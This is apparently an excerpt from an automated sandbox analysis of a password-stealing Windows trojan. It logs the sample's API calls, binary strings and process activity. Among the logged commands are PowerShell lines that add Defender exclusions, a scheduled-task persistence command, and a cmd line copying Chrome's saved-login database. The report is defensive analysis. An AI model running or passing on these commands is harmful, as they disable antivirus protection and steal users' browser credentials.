          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018295D0 NtClose,10_2_018295D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018295F0 NtQueryInformationFile,10_2_018295F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829520 NtWaitForSingleObject,10_2_01829520
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0182AD30 NtSetContextThread,10_2_0182AD30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829540 NtReadFile,10_2_01829540
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829560 NtWriteFile,10_2_01829560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829780 NtMapViewOfSection,10_2_01829780
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018297A0 NtUnmapViewOfSection,10_2_018297A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829FE0 NtCreateMutant,10_2_01829FE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829710 NtQueryInformationToken,10_2_01829710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0182A710 NtOpenProcessToken,10_2_0182A710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829730 NtQueryVirtualMemory,10_2_01829730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829760 NtOpenProcess,10_2_01829760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829770 NtSetInformationFile,10_2_01829770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0182A770 NtOpenThread,10_2_0182A770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018296D0 NtCreateKey,10_2_018296D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829610 NtEnumerateValueKey,10_2_01829610
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829650 NtQueryValueKey,10_2_01829650
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01829670 NtQueryInformationProcess,10_2_01829670
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.426300401.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000003027000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameReactionDiffusion.dllJ vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.440634324.00000000077B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAads.dll* vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameReactionDiffusion.dllJ vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameReactionDiffusion.dllJ vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438174775.0000000005410000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAads.dll* vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002C81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAads.dll* vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000A23000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefOac.exe( vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438259530.0000000005570000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameReactionDiffusion.dllJ vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.424513444.000000000A0B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefOac.exe( vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000018DF000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: hkkRsa.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe ReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Users\user\AppData\Roaming\hkkRsa.exe C:\Users\user\AppData\Roaming\hkkRsa.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Process created: C:\Users\user\AppData\Roaming\hkkRsa.exe C:\Users\user\AppData\Roaming\hkkRsa.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe File created: C:\Users\user\AppData\Roaming\hkkRsa.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe File created: C:\Users\user\AppData\Local\Temp\tmpE41B.tmp
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/18@8/8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:60:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:492:120:WilError_01
          Source: C:\Windows\SysWOW64\rundll32.exe File written: C:\Users\user\AppData\Roaming\479O54QF\479logrc.ini
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.427644663.0000000001622000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.424015597.0000000001483000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.487071109.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.486692282.000000000496F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004DBF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.427644663.0000000001622000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.424015597.0000000001483000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.487071109.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.486692282.000000000496F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004DBF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: hkkRsa.exe, 0000000E.00000002.486732177.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.489051209.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000010.00000002.911333276.0000000001330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fOac.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000982000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.911442424.0000000004A68000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: hkkRsa.exe, 0000000E.00000002.486732177.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.489051209.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000010.00000002.911333276.0000000001330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fOac.pdb source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000982000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.911442424.0000000004A68000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 0_2_0125FB10 pushad ; retf 0_2_0125FB11
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Code function: 9_2_02E0FB10 pushad ; retf 9_2_02E0FB11
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Code function: 9_2_02E0FB12 pushad ; retf 9_2_02E0FB11
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_004178D5 pushad ; iretd 10_2_004178DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041EA32 push ebp; ret 10_2_0041EA33
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_00417C0B push ss; iretd 10_2_00417C39
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041D4D5 push eax; ret 10_2_0041D528
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_00417D4F push ebx; ret 10_2_00417D61
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041D522 push eax; ret 10_2_0041D528
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041D52B push eax; ret 10_2_0041D592
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041E58D pushfd ; ret 10_2_0041E58E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0041D58C push eax; ret 10_2_0041D592
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_004167B4 push edx; retf 10_2_004167B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0183D0D1 push ecx; ret 10_2_0183D0E4
          Source: initial sample Static PE information: section name: .text entropy: 7.772224469495988
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe File created: C:\Users\user\AppData\Roaming\hkkRsa.exe

          Boot Survival

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
